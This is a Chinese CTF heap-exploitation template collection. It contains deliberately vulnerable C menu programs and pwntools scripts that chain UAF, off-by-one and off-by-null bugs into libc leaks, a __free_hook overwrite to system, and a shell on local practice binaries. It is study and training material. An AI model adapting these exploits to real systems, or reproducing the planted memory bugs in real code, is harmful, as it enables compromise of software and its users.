pwn題常見堆利用總結

這里記錄一些ctf中堆pwn的板子，總結學習

UAF打掉tcache拿libc

//uaf
#include<stdio.h>
#include<stdlib.h>
/* Table of chunk pointers filled in by create(): 0x20 slots. */
char *heap[0x20];
/* Slot that create() fills next. dele() decrements it without compacting the
 * table, so it is not a reliable count of live chunks. */
int num=0;
/*
 * Menu option 1: read a size from stdin and store a fresh malloc() chunk in
 * heap[num], then advance num.
 *
 * Review notes:
 *  - scanf()'s return value is not checked, so `size` is uninitialised when
 *    the input is not a number.
 *  - Only the upper bound is tested; a negative size passes the check and is
 *    converted to a very large size_t when handed to malloc().
 *  - The malloc() result is stored without a NULL check, and the requested
 *    size is not recorded anywhere, so edit() has nothing to bound its
 *    write against.
 *  - The slot is always heap[num]; since dele() only decrements num, this
 *    can overwrite a pointer that is still in use.
 */
void create()
{
    if(num>=0x20)   // table full
    {
        puts("no more");
        return;
    }
    int size;
    puts("how big");
    scanf("%d",&size);
    if(size>=0x20)  // upper bound only; negative values are accepted
    {
        puts("no more");
        return;
    }
    heap[num]=(char *)malloc(size);
    num++;
}
/*
 * Menu option 4: read an index from stdin and print heap[idx] as a C string.
 *
 * Review notes:
 *  - read() is used but <unistd.h> is not among the includes of this listing.
 *  - Four bytes are read into buf[4] with no room for a terminator, so
 *    atoi() can run past the end of buf.
 *  - idx is never range-checked (negative or >= 0x20 indexes outside heap[]).
 *  - dele() leaves the freed pointer in the table, so this function can print
 *    the contents of a chunk that has already been freed.
 *  - "%s" stops only at a NUL byte, which the chunk is not guaranteed to hold.
 *  - `i` is unused.
 */
void show(){
    int i;
  int idx;
  char buf[4];
  puts("idx");
    (read(0, buf, 4));      // return value ignored; buf is not NUL-terminated
    idx = atoi(buf);
  if (!heap[idx]) {         // only a NULL check: a stale pointer passes
    puts("no hvae things\n");
  } else {
    printf("Content:");
    printf("%s",heap[idx]);
  }
}
/*
 * Menu option 2: read an index from stdin and free heap[idx].
 *
 * Review notes (this is the defect the listing's "//uaf" header refers to):
 *  - heap[idx] is not cleared after free(), so the dangling pointer stays
 *    reachable from show(), edit() and a second dele() on the same index.
 *    The fix is `heap[idx] = NULL;` right after the free().
 *  - idx is never range-checked, and buf is not NUL-terminated before atoi().
 *  - num is decremented regardless of which slot was freed, so the next
 *    create() writes to heap[num], not to the slot released here.
 *  - `i` is unused.
 */
void dele()
{
    int i;
  int idx;
  char buf[4];
  puts("idx");
    (read(0, buf, 4));      // return value ignored; buf is not NUL-terminated
    idx = atoi(buf);
  if (!heap[idx]) {
    puts("no hvae things\n");
  } else {
      free(heap[idx]);      // pointer is left in the table afterwards
      num--;
  }
}
/*
 * Menu option 3: read an index and a length from stdin, then read that many
 * bytes from stdin into heap[idx].
 *
 * Review notes:
 *  - The length limit (<= 0x20) is a constant, not the size the chunk was
 *    allocated with; create() only hands out requests below 0x20 and does
 *    not record them, so the write can exceed the chunk.
 *  - A negative length passes the `size>0x20` test and reaches read() as a
 *    size_t.
 *  - dele() leaves freed pointers in the table, so this can write into a
 *    chunk that has already been freed.
 *  - idx is never range-checked, buf is not NUL-terminated before atoi(),
 *    and the scanf()/read() return values are ignored.
 *  - `i` is unused.
 */
void edit()
{
    int size;
    int i;
  int idx;
  char buf[4];
  puts("idx");
    (read(0, buf, 4));
    idx = atoi(buf);
  if (!heap[idx]) {         // only a NULL check: a stale pointer passes
    puts("no hvae things\n");
  } else {
      puts("how big u read");
      scanf("%d",&size);
      if(size>0x20)         // inclusive bound, unrelated to the allocation size
      {
          puts("too more");
          return;
      }
      puts("Content:");
      read(0,heap[idx],size);
  }
}
/* Print the four menu entries, one per line. */
void menu(void){
    static const char *const entries[] = {
        "1.create",
        "2.dele",
        "3.edit",
        "4.show",
    };
    for (size_t k = 0; k < sizeof entries / sizeof entries[0]; k++) {
        puts(entries[k]);
    }
}
/*
 * Menu loop: print the menu, read a choice and dispatch to the handler.
 * The loop has no exit option.
 *
 * Review notes:
 *  - `void main()` is not a standard signature; `int main(void)` is.
 *  - scanf()'s return value is not checked. On non-numeric input the
 *    offending characters stay in the stream and `choice` is not updated, so
 *    the loop keeps spinning; the same happens at end of input.
 */
void main()
{
    int choice;
    while(1)
    {
        menu();
        scanf("%d",&choice);
        switch(choice)
        {
            case 1:create();break;
            case 2:dele();break;
            case 3:edit();break;
            case 4:show();break;
            default:puts("error");
        }
    }
}

EXP

from pwn import *
# Local lab setup: start the ./uaf binary as a child process and load its ELF
# metadata; elf.libc is the libc pwntools resolves for that binary.
r=process('./uaf')
elf = ELF("uaf")
libc=elf.libc
# context.log_level='debug'
def add(size):
    """Drive menu option 1 (create) with the given size."""
    r.sendlineafter("4.show\n",'1')
    r.sendlineafter("how big\n",str(size))

def dele(idx):
    """Drive menu option 2 (dele) for slot `idx`."""
    r.sendlineafter("4.show\n",'2')
    r.sendlineafter("idx\n",str(idx))

def edit(idx,size,con):
    """Drive menu option 3 (edit): send `size`, then the raw bytes `con`, for slot `idx`."""
    r.sendlineafter("4.show\n",'3')
    r.sendlineafter("idx\n",str(idx))
    r.sendlineafter("how big u read\n",str(size))
    r.sendafter("Content:\n",con)
def show(idx):
    """Drive menu option 4 (show) for slot `idx`; the caller reads the reply."""
    r.sendlineafter("4.show\n",'4')
    r.sendlineafter("idx\n",str(idx))

def dbg():
    """Attach gdb to the running target and wait for a key press."""
    gdb.attach(r)
    pause()
# NOTE(review): written for Python 2 (recv() output is concatenated with str
# literals). The constants 0x001680 and 0x3ebee0 are tied to the author's heap
# layout and libc build, and glibc 2.34 and later no longer call __free_hook.
for i in range(7):
    add(0x10)
# leak a heap address
dele(0)
dele(1)
show(1)
r.recvuntil("Content:")
heap=u64(r.recv(6)+'\x00'*2)-0x001680+0x10
print(hex(heap))
# allocate into the tcache management area and restore the tcache struct so that 0x20 chunks keep working
edit(0,0x10,p64(heap))
add(0x10)
add(0x10)
add(0x10)
add(0x10)
add(0x10)
edit(7,0x20,p64(0)*4) # index 7 is the tcache struct
# use the UAF to allocate the part of the tcache struct that manages 0x250 chunks
dele(5)# 5-1
edit(5,0x10,p64(heap+0x20))
add(0x10)
add(0x10)
edit(10,0x20,p64(0x0000000007000000))
dele(7)
# reach the unsorted bin, then split the chunk to obtain a libc address
add(0x10)
show(10)
r.recvuntil("Content:")
base=u64(r.recv(6)+'\x00'*2)-0x3ebee0
print(hex(base))
free=base+libc.sym['__free_hook']
sys=base+libc.sym['system']
# restore the struct, then do the final UAF step
edit(10,0x20,p64(0)*4)
dele(10)
edit(10,0x20,p64(free))
add(0x10)
add(0x10)
edit(11,0x10,p64(sys))
edit(10,0x10,"/bin/sh\x00")
dele(10)
r.interactive()

小溢出堆疊(offbyone/向下合并/萬用合并)

#include<stdio.h>
#include <math.h>
#include <stdio.h>
#include<unistd.h>
#include <dirent.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
/*
 * Install a seccomp-BPF filter on the calling thread.
 *
 * Filter logic as written:
 *   0: load seccomp_data.arch (offset 4)
 *   1: if it is not 0xc000003e (AUDIT_ARCH_X86_64), skip to the KILL at 4
 *   2: load seccomp_data.nr (offset 0)
 *   3: if it is 59 (execve on x86-64) fall through to KILL, else skip to ALLOW
 *   4: SECCOMP_RET_KILL
 *   5: SECCOMP_RET_ALLOW
 *
 * NOTE(review): this is a default-allow filter that denies one syscall
 * number. A sandbox meant to contain a compromised process should be a
 * default-deny allow-list instead. Neither prctl() return value is checked,
 * so a failure to install the filter goes unnoticed.
 */
void sandbox(){
    struct sock_filter filter[] = {
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS,4),
    BPF_JUMP(BPF_JMP+BPF_JEQ,0xc000003e,0,2),
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS,0),
    BPF_JUMP(BPF_JMP+BPF_JEQ,59,0,1),
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_KILL),
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
    .len = (unsigned short)(sizeof(filter)/sizeof(filter[0])),
    .filter = filter,
    };
    prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);             // required before an unprivileged filter install
    prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);
}
/*
 * Call setvbuf() with mode 2 and no caller-supplied buffer on stdin, stdout
 * and stderr, in that order (mode 2 is _IONBF on glibc).
 * Returns the setvbuf() result for stderr.
 */
int init()
{
    FILE *const first_two[] = { stdin, stdout };
    for (int k = 0; k < 2; k++) {
        setvbuf(first_two[k], 0LL, 2, 0LL);
    }
    return setvbuf(stderr, 0LL, 2, 0LL);
}
/* Slot that create() fills next; dele() decrements it. */
int num=0;
/* Chunk pointers, 0x10 slots. */
char *heaparray[0x10];
/* Size requested for each slot, recorded by create() and cleared by dele(). */
size_t realsize[0x10];
/*
 * Menu option 1: read a size from stdin, malloc() it and record the pointer
 * and size in slot `num`.
 *
 * Review notes:
 *  - The capacity test uses 0x20 but heaparray[] and realsize[] have 0x10
 *    entries, so slots 0x10..0x1f are written outside both arrays.
 *  - The size is not validated at all (any int, including negative values),
 *    scanf()'s return value is ignored and the malloc() result is not
 *    checked for NULL.
 *  - <stdlib.h> is not among this listing's includes, so malloc() has no
 *    visible prototype here.
 *  - The slot is always `num`; dele() decrements num whatever index it
 *    freed, so this can overwrite a slot that is still in use.
 */
void create(){
    if(num>=0x20)   // bound does not match the 0x10-entry arrays
    {
        puts("no more");
        return;
    }
    int size;
    puts("Size of Heap : ");
    scanf("%d",&size);
    heaparray[num]=(char *)malloc(size);
    realsize[num]=size;
    num++;

    }
/*
 * Menu option 4: read an index, validate it against [0, 0x10) and print the
 * recorded size and the chunk contents as a C string.
 *
 * Review notes:
 *  - buf[4] is filled by read() with no terminator, so atoi() can run past
 *    the end of buf.
 *  - realsize[idx] is a size_t printed with "%ld"; the matching conversion
 *    is "%zu".
 *  - "%s" stops only at a NUL byte, which the chunk is not guaranteed to
 *    hold, so the output can continue past the end of the chunk.
 */
void show(){
    int idx ;
    char buf[4];
    printf("Index :\n");
    read(0,buf,4);// read the chunk index
    idx = atoi(buf);
    if(idx < 0 || idx >= 0x10){
        puts("Out of bound!");
        _exit(0);
    }
    if(heaparray[idx]){// look the chunk up by index
        // print the contents of the selected chunk
        printf("Size : %ld\nContent : %s\n",realsize[idx],heaparray[idx]);
        puts("Done !");
    }else{
        puts("No such heap !");
    }
}
/*
 * Menu option 3: read an index, validate it against [0, 0x10), then read a
 * caller-chosen number of bytes from stdin into the chunk.
 *
 * Review notes:
 *  - The write length comes straight from stdin and is never compared with
 *    realsize[idx], so the write can run past the end of the chunk. Bounding
 *    it with realsize[idx] is the fix.
 *  - scanf()/read() return values are ignored; a negative size reaches
 *    read() as a size_t.
 *  - buf[4] is not NUL-terminated before atoi().
 */
void edit(){
    int idx ;
    char buf[4];
    printf("Index :\n");
    read(0,buf,4);// read the chunk index
    idx = atoi(buf);
    if(idx < 0 || idx >= 0x10){// validate the index
        puts("Out of bound!");
        _exit(0);
    }
  // the index is valid
    if(heaparray[idx]){
        int size;
    puts("Size of Heap : ");
    scanf("%d",&size);
        printf("Content of heap : \n");
        read(0,heaparray[idx],size);
    // the original note mentions a read_input helper; the code calls read() directly
        puts("Done !");
    }else{
        puts("No such heap !");
    }
}
/*
 * Menu option 2: read an index, validate it against [0, 0x10), free the
 * chunk and clear both the pointer and the recorded size.
 *
 * Clearing heaparray[idx] after free() means this slot cannot be freed or
 * dereferenced again through the table.
 *
 * Review notes:
 *  - num is decremented whatever index was freed, so the next create() may
 *    reuse a slot other than the one released here.
 *  - buf[4] is not NUL-terminated before atoi().
 */
void dele(){
    int idx ;
    char buf[4];
    printf("Index :\n");
    read(0,buf,4);// read the index
    idx = atoi(buf);
    if(idx < 0 || idx >= 0x10){// validate the chunk index
        puts("Out of bound!");
        _exit(0);
    }
    if(heaparray[idx]){
        free(heaparray[idx]);// release the chunk held in heaparray[idx]
        realsize[idx] = 0 ;
        heaparray[idx]=NULL;
        puts("Done !"); 
        num--;
    }else{
        puts("No such heap !");
    }
}
/* Print the four menu entries, one per line. */
void menu(void){
    static const char *const entries[] = {
        "1.create",
        "2.dele",
        "3.edit",
        "4.show",
    };
    for (size_t k = 0; k < sizeof entries / sizeof entries[0]; k++) {
        puts(entries[k]);
    }
}
/*
 * Entry point: disable stdio buffering, install the seccomp filter, then run
 * the menu loop forever (there is no exit option).
 *
 * Review notes:
 *  - `void main()` is not a standard signature; `int main(void)` is.
 *  - scanf()'s return value is not checked, so non-numeric input or end of
 *    input leaves `choice` unchanged and the loop keeps spinning.
 */
void main()
{
    init();
    sandbox();
    int choice;
    while(1)
    {
        menu();
        scanf("%d",&choice);
        switch(choice)
        {
            case 1:create();break;
            case 2:dele();break;
            case 3:edit();break;
            case 4:show();break;
            default:puts("error");
        }
    }
}

EXP

from pwn import *
# Local lab setup: start the ./zheap binary as a child process and load its
# ELF metadata; elf.libc is the libc pwntools resolves for that binary.
r=process('./zheap')
elf = ELF('zheap')
libc=elf.libc
context.log_level='debug'
def add(size):
    """Drive menu option 1 (create) with the given size."""
    r.sendlineafter("4.show\n",'1')
    r.sendlineafter("Size of Heap : \n",str(size))

def dele(idx):
    """Drive menu option 2 (dele) for slot `idx`."""
    r.sendlineafter("4.show\n",'2')
    r.sendlineafter("Index :\n",str(idx))

def edit(idx,con):
    """Drive menu option 3 (edit) for slot `idx` and send `con` at the content prompt.

    NOTE(review): the target's edit() also prints "Size of Heap : " and reads a
    size before the content prompt; this helper never sends one — confirm
    against the binary actually used.
    """
    r.sendlineafter("4.show\n",'3')
    r.sendlineafter("Index :\n",str(idx))
    r.sendafter("Content of heap : \n",con)
def show(idx):
    """Drive menu option 4 (show) for slot `idx`; the caller reads the reply."""
    r.sendlineafter("4.show\n",'4')
    r.sendlineafter("Index :\n",str(idx))
def dbg():
    """Attach gdb to the running target and wait for a key press."""
    gdb.attach(r)
    pause()
# NOTE(review): written for Python 2. The constant 0x3ec090 is tied to the
# author's libc build, and glibc 2.34 and later no longer call __free_hook.
# nine 0x80 chunks = 0x480; fill them with 0x21 so the merge is set up by hand
add(0x18)#0
add(0x78)#1
for i in range(10):
    add(0x78)
for i in range(2,10):
    edit(i,p64(0x21)*14)
edit(0,'a'*0x18+p64(0x421))
dele(1)
# once libc is leaked, look for overlapping (reused) chunks
add(0x18)
show(1)
r.recvuntil("Content : ")
leak=u64(r.recv(6)+'\x00'*2)
print(hex(leak))
base=leak-0x3ec090
sys=libc.sym['system']+base
free=libc.sym['__free_hook']+base
# inspecting the heap with vmmap shows that the chunks overlap
dele(1)
edit(11,p64(free))
add(0x18)
add(0x18)
edit(11,"/bin/sh")
edit(12,p64(sys))
dele(11)
r.interactive()

offbyone向下合并構造堆復用(malloc_consolidate拿libc)

題目漏洞就是edit的offbyone，數據輸入用的scanf輸入

from pwn import *
context.log_level = 'debug'
context.arch='amd64'
# The bare string below is a no-op expression kept as a note: candidate gadget
# offsets with their constraints, presumably tool output for the author's
# libc build — confirm before relying on any of them.
'''
0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL

0x4f432 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a41c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
  '''
# Short aliases around the pwntools tube `p` (assigned further down).
# sa/sla pass `data` through str() before sending; uu32/uu64 read up to a
# marker byte and unpack the trailing bytes as an integer.
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

# Local lab setup: the binary is started as a child process.
p = process("bitflip")
elf = ELF('bitflip')
libc = elf.libc

def cmd(choice):
    """Answer the 'Your choice: ' menu prompt with `choice`."""
    sla('Your choice: ',choice)
def add(idx,size):
    """Menu option 1: create a note of `size` bytes in slot `idx`."""
    cmd(1)
    sla('Index: ',idx)
    sla('Size: ',size)

def edit(idx,content):
    """Menu option 2: send `content` (newline-terminated) for slot `idx`."""
    cmd(2)
    sla('Index: ',idx)
    p.sendlineafter(': ',content)

def show(idx):
    """Menu option 3: request the contents of slot `idx`; the caller reads the reply."""
    cmd(3)
    sla('Index: ',idx)

def delete(idx):
    """Menu option 4: delete slot `idx`."""
    cmd(4)
    sla('Index: ',idx)
def dbg():
    """Attach gdb to the running target and wait for a key press."""
    gdb.attach(p)
    pause()

# NOTE(review): the write-up gives no stage comments for this run and the
# target's source is not shown. Written for Python 2; the constants 160 and
# 0x3EBC40 are tied to the author's libc build, and glibc 2.34 and later no
# longer call __free_hook.
for i in range(9):
    add(i,0x48)
for i in range(8):
    delete(i)

p.sendlineafter('Your choice: ','99999999'*0xf0)
for i in range(7):
    add(i,0x48)

add(7,0x48)
show(7)
p.recvuntil('Content: ')
libc_base = u64(p.recv(6)+'\x00'*2)-160-0x3EBC40
lg('libc_base',libc_base)
sys=libc.sym['system']+libc_base
free=libc.sym['__free_hook']+libc_base
for i in range(9,16):
    add(i,0x18)
for i in range(16,23):
    add(i,0x28)

add(23,0x18)
add(24,0x28)
add(25,0x18)
add(26,0x18)

for i in range(9,23):
    delete(i)
delete(25)
edit(23,'a'*0x18+'\x51')
delete(24)
add(27,0x48)
edit(27,p64(0x21)*6+p64(free-0x10))
for i in range(9,16):
    add(i,0x18)
add(24,0x18)
edit(24,'/bin/sh\x00')
add(25,0x18)
edit(25,p64(sys))
delete(24)

p.interactive()

大堆合并(offbynull/向前合并)

題目就是offbynull漏洞,一般可申請的堆都在0x100左右

EXP

from pwn import *
context.log_level = 'debug'
context.arch='amd64'

# Short aliases around the pwntools tube `p` (assigned further down).
# sa/sla pass `data` through str() before sending; uu32/uu64 read up to a
# marker byte and unpack the trailing bytes as an integer.
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

# Local lab setup: the binary is started as a child process.
p = process("old_school_revenge")
elf = ELF('old_school_revenge')
libc = elf.libc

def cmd(choice):
    """Answer the 'Your choice: ' menu prompt with `choice`."""
    sla('Your choice: ',choice)
def add(idx,size):
    """Menu option 1: create a note of `size` bytes in slot `idx`."""
    cmd(1)
    sla('Index: ',idx)
    sla('Size: ',size)

def edit(idx,content):
    """Menu option 2: send `content` (newline-terminated) for slot `idx`."""
    cmd(2)
    sla('Index: ',idx)
    p.sendlineafter(': ',content)

def show(idx):
    """Menu option 3: request the contents of slot `idx`; the caller reads the reply."""
    cmd(3)
    sla('Index: ',idx)

def delete(idx):
    """Menu option 4: delete slot `idx`."""
    cmd(4)
    sla('Index: ',idx)
def dbg():
    """Attach gdb to the running target and wait for a key press."""
    gdb.attach(p)
    pause()

# NOTE(review): written for Python 2. The constants 160 and 0x3EBC40 are tied
# to the author's libc build, and glibc 2.34 and later no longer call
# __free_hook. The target's source is not shown in the write-up.
for i in range(9):
    add(i,0x48)
for i in range(8):
    delete(i)

p.sendlineafter('Your choice: ','99999999'*0xf0)
for i in range(7):
    add(i,0x48)

add(7,0x48)
show(7)
p.recvuntil('Content: ')
libc_base = u64(p.recv(6)+'\x00'*2)-160-0x3EBC40
lg('libc_base',libc_base)
free=libc_base+libc.sym['__free_hook']
sys=libc_base+libc.sym['system']
# the part above reuses the scanf-input template unchanged to obtain the libc base
for i in range(10,17):
    add(i,0xf8)
add(17,0xf8)
add(18,0x88)# the middle chunk, the one that gets edited
add(19,0xf8)
add(20,0x88)
for i in range(10,17):
    delete(i)

delete(17)
edit(18,'a'*0x80+p64(0x190))
delete(19)
for i in range(10,17):
    add(i,0xf8)
add(21,0xf8)
add(22,0x88)
delete(18)
edit(22,p64(free))
add(23,0x88)
edit(23,'/bin/sh\x00')
add(24,0x88)
edit(24,p64(sys))
delete(23)
p.interactive()

大堆合并(offbynull在libc2.31/2.29下的利用)

題目限制堆數量10個，for循環編號賦予
基本上無size限制,僅有offbynull漏洞，libc-2.31

思路

偽造出一個chunk，使其能夠繞過這兩個檢測。
一個是向低地址合并的檢測:

if (__glibc_unlikely (chunksize(p) != prevsize))
    malloc_printerr ("corrupted size vs. prev_size while consolidating");

另一個就是unlink時候的檢測

if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
    malloc_printerr (check_action, "corrupted double-linked list", P, AV);
image.png

EXP

from pwn import *
context.log_level = 'debug'

# Short aliases around the pwntools tube `p` (assigned further down).
# sa/sla pass `data` through str() before sending; uu32/uu64 read up to a
# marker byte and unpack the trailing bytes as an integer.
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

# Local lab setup: the binary is started as a child process.
p = process("bornote")
elf = ELF('bornote')
libc = elf.libc

def cmd(choice):
    """Answer the "aaa's cmd: " prompt with `choice` ('aaa' is the username sent at start-up)."""
    sla("aaa's cmd: ",choice)

def add(size):
    """Menu option 1: create a note of `size` bytes; the target assigns the index."""
    cmd(1)
    sla('Size: ',size)

def edit(idx,content):
    """Menu option 3: send `content` (newline-terminated) for note `idx`."""
    cmd(3)
    sla('Index: ',idx)
    p.sendlineafter('Note: ',content)

def show(idx):
    """Menu option 4: request the contents of note `idx`; the caller reads the reply."""
    cmd(4)
    sla('Index: ',idx)

def delete(idx):
    """Menu option 2: delete note `idx`."""
    cmd(2)
    sla('Index: ',idx)

def dbg():
    """Attach gdb to the running target and wait for a key press."""
    gdb.attach(p)
    pause()
# NOTE(review): written for Python 2. The constant 0x1EBBE0 is tied to the
# author's libc build, and glibc 2.34 and later no longer call __free_hook.
# `fakechunk` is assigned but not used anywhere in this listing; it looks like
# an address noted from one debugging session.
fakechunk = 0x00005561306c6f00
sla('username: ','aaa')
# keep the largest size here at or below 0x440, otherwise the chunks do not land in the same largebin range
add(0x418) # 0 
add(0x128) # 1 # used at the end to pass the tcache count check; same size as the overlapping chunk used last
add(0x418) # 2
add(0x438) # 3 
add(0x148) # 4
add(0x428) # 5 
add(0x138) # 6

# the fake chunk picks up fd and bk
delete(0)
delete(3)
delete(5)

# set the fake chunk's size field
delete(2) 
add(0x438)  # 0 
edit(0,'a' * 0x418 + p64(0xb01)[:7])
add(0x418)  # 2 
add(0x428)  # 3 
add(0x418)  # 5 

# set bk
delete(5)
delete(2)
add(0x418)  # 2 
edit(2,p64(0))
add(0x418)  # 5 

# set fd
delete(5)
delete(3)
add(0x5f8)# 3 # moved into the largebin
add(0x428)# 5
edit(5,'')
add(0x418)# 7
add(0xf8)# 8

# set prev_size
edit(6,'a'*0x130+p64(0xb00))
delete(3)

add(0x10)# 3
show(7)
p.recvuntil("Note: ")
libc_base = u64(p.recv(6).ljust(8,'\x00'))- 0x1EBBE0
lg('libc_base',libc_base)
sys = libc_base + libc.sym["system"]
free_hook = libc_base + libc.sym["__free_hook"]
add(0x128)#9
delete(1)
delete(9)
edit(7,p64(free_hook))
add(0x128)# 1
add(0x128)# 9
edit(1,"/bin/sh\x00")
edit(9,p64(sys))
delete(1)

p.interactive()

爆破

思路

漏洞是UAF，但每次申請的size大小不可控,導致無法準確申請到想要的堆
盡量避免doublefree的申請，降低爆破次數

EXP

#coding=utf-8
from pwn import *
# context.log_level = 'debug'

# Short aliases around the pwntools tube `p`, which is (re)assigned by the
# retry loop at the bottom of the script.
# sa/sla pass `data` through str() before sending; uu32/uu64 read up to a
# marker byte and unpack the trailing bytes as an integer.
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)
# p = process("random_heap")
elf = ELF('random_heap')
libc = elf.libc
def cmd(choice):
    """Answer the 'Your choice: ' menu prompt with `choice`."""
    sla("Your choice: ",choice)
def add(idx,size):
    """Menu option 1: create an entry in slot `idx`, sending `size` at the size prompt."""
    cmd(1)
    sla("Index: ",idx)
    sla("Size: ",size)
def edit(idx,content):
    """Menu option 2: send the raw bytes `content` (no newline added) for slot `idx`."""
    cmd(2)
    sla("Index: ",idx)
    p.sendafter("Content: ",content)
def show(idx):
    """Menu option 3: request the contents of slot `idx`; the caller reads the reply."""
    cmd(3)
    sla("Index: ",idx)
def delete(idx):
    """Menu option 4: delete slot `idx`."""
    cmd(4)
    sla("Index: ",idx)
def dbg():
    """Attach gdb to the running target and wait for a key press."""
    gdb.attach(p)
    pause()

def pwn():
    """One attempt against the process currently bound to the global `p`.

    Calls exit() when the value read back after the last show() does not match
    the expected address; the retry loop below treats that as a failed attempt.

    NOTE(review): Python 2 only (print statement, str/bytes concatenation).
    The constants 0x260, 96 and 0x3ebc40 are tied to the author's heap layout
    and libc build, and glibc 2.34 and later no longer call __free_hook.
    """
    add(0,0xf8)
    add(1,0x88)
    edit(1,'/bin/sh\x00')
    # leak a heap address
    delete(0)
    edit(0,'a'*0x10)
    delete(0)
    show(0)
    p.recvuntil("Content: ")
    heap=u64(p.recv(6)+'\x00'*2)-0x260
    lg('heap',heap)
    for i in range(6):
        edit(0,'a'*0x10)
        delete(0)
    show(0)
    p.recvuntil("Content: ")
    libc_base=u64(p.recv(6)+'\x00'*2)-96-0x3ebc40
    lg('libc_base',libc_base)
    free_hook = libc_base + libc.sym['__free_hook']
    system = libc_base + libc.sym['system']
    add(2,0x18)
    delete(2)
    edit(0,p64(free_hook)*2)
    delete(2)
    edit(0,p64(free_hook)*2)
    add(2,0x18)
    show(2)
    tmp = u64(((p.recvuntil("\x7f",timeout=0.4))[-6::]).ljust(8,'\x00'))
    if(tmp!=free_hook):
        exit()
    add(3,0x18)
    edit(3,p64(system))
    delete(1)
    p.sendline("cat flag")
    print p.recvuntil("}",timeout=0.4)

# Retry loop: start a fresh local process for every attempt and count failures.
# NOTE(review): the bare `except:` also catches SystemExit (raised by exit() in
# pwn()) and KeyboardInterrupt, so Ctrl-C does not stop the loop, and the loop
# has no upper bound on attempts.
times = 0
while 1:
    try:
        p = process("./random_heap")
        pwn()
        p.interactive()
    except:
        times += 1
        print("="*8+str(times)+" times"+"="*8)
        p.close()